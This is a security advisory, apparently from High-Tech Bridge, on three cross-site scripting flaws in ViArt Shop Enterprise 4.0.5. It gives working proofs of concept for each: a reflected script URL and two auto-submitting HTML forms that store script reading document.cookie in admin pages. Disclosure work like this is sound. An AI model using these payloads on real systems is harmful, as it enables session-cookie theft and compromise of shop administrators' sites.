ViArt Shop version 4.0.5 suffers from multiple cross site scripting vulnerabilities.
64c028598a63647a7426731f268b4ab2e7c0f6f73f11def2837cb27a9d57f85e
====================================
Vulnerability ID: HTB22814
Reference: http://www.htbridge.ch/advisory/xss_vulnerability_in_viart_shop.html
Product: ViArt Shop
Vendor: Viart Software ( http://www.viart.com/ )
Vulnerable Version: Enterprise v.4.0.5
Vendor Notification: 25 January 2011
Vulnerability Type: XSS (Cross Site Scripting)
Status: Not Fixed
Risk level: Medium
Credit: High-Tech Bridge SA - Ethical Hacking & Penetration Testing (http://www.htbridge.ch/)
Vulnerability Details:
User can execute arbitrary JavaScript code within the vulnerable application.
The vulnerability exists due to failure in the "/admin/admin_product.php" script to properly sanitize user-supplied input in "item_id" variable. Successful exploitation of this vulnerability could result in a compromise of the application, theft of cookie-based authentication credentials, disclosure or modification of sensitive data.
An attacker can use browser to exploit this vulnerability. The following PoC is available:
http://host/admin/admin_product.php?category_id=0&item_id=1%22%3E%3Cscript%3Ealert%28document.cookie%29%3C/script%3E
====================================
Vulnerability ID: HTB22815
Reference: http://www.htbridge.ch/advisory/xss_vulnerability_in_viart_shop_1.html
Product: ViArt Shop
Vendor: Viart Software ( http://www.viart.com/ )
Vulnerable Version: Enterprise v.4.0.5
Vendor Notification: 25 January 2011
Vulnerability Type: Stored XSS (Cross Site Scripting)
Status: Not Fixed
Risk level: Medium
Credit: High-Tech Bridge SA - Ethical Hacking & Penetration Testing (http://www.htbridge.ch/)
Vulnerability Details:
User can execute arbitrary JavaScript code within the vulnerable application.
The vulnerability exists due to failure in the "admin/admin_global_settings.php" script to properly sanitize user-supplied input in "html_below_footer" variable. Successful exploitation of this vulnerability could result in a compromise of the application, theft of cookie-based authentication credentials, disclosure or modification of sensitive data.
An attacker can use browser to exploit this vulnerability. The following PoC is available:
<form action="http://host/admin/admin_global_settings.php" method="post" name="main">
<input type="hidden" name="operation" value="save">
<input type="hidden" name="rp" value="admin.php">
<input type="hidden" name="tab" value="general">
<input type="hidden" name="site_name" value="Default Site">
<input type="hidden" name="site_url" value="http://host/">
<input type="hidden" name="admin_email" value="email@example.com">
<input type="hidden" name="layout_id" value="1">
<input type="hidden" name="password_encrypt" value="0">
<input type="hidden" name="admin_password_encrypt" value="0">
<input type="hidden" name="html_below_footer" value='12345"><script>alert(document.cookie)</script>'>
<input type="hidden" name="operation" value="save">
</form>
<script>
document.main.submit();
</script>
====================================
Vulnerability ID: HTB22816
Reference: http://www.htbridge.ch/advisory/xss_vulnerability_in_viart_shop_2.html
Product: ViArt Shop
Vendor: Viart Software ( http://www.viart.com/ )
Vulnerable Version: Enterprise v.4.0.5
Vendor Notification: 25 January 2011
Vulnerability Type: Stored XSS (Cross Site Scripting)
Status: Not Fixed
Risk level: Medium
Credit: High-Tech Bridge SA - Ethical Hacking & Penetration Testing (http://www.htbridge.ch/)
Vulnerability Details:
User can execute arbitrary JavaScript code within the vulnerable application.
The vulnerability exists due to failure in the "/admin/admin_manufacturer.php" script to properly sanitize user-supplied input in "manufacturer_name" variable. Successful exploitation of this vulnerability could result in a compromise of the application, theft of cookie-based authentication credentials, disclosure or modification of sensitive data.
An attacker can use browser to exploit this vulnerability. The following PoC is available:
<form action="http://host/admin/admin_manufacturer.php" method="post" name="main">
<input type="hidden" name="operation" value="save">
<input type="hidden" name="manufacturer_id" value="3">
<input type="hidden" name="manufacturer_name" value='Company"><script>alert(document.cookie)</script>'>
<input type="hidden" name="manufacturer_order" value="1">
<input type="hidden" name="friendly_url" value="">
<input type="hidden" name="affiliate_code" value="">
<input type="hidden" name="short_description" value="">
<input type="hidden" name="full_description" value="">
<input type="hidden" name="image_small" value="images/manufacturers/small/company.gif">
<input type="hidden" name="image_small_alt" value="company">
<input type="hidden" name="image_large" value="images/manufacturers/large/company.gif">
<input type="hidden" name="image_large_alt" value="company">
</form>
<script>
document.main.submit();
</script>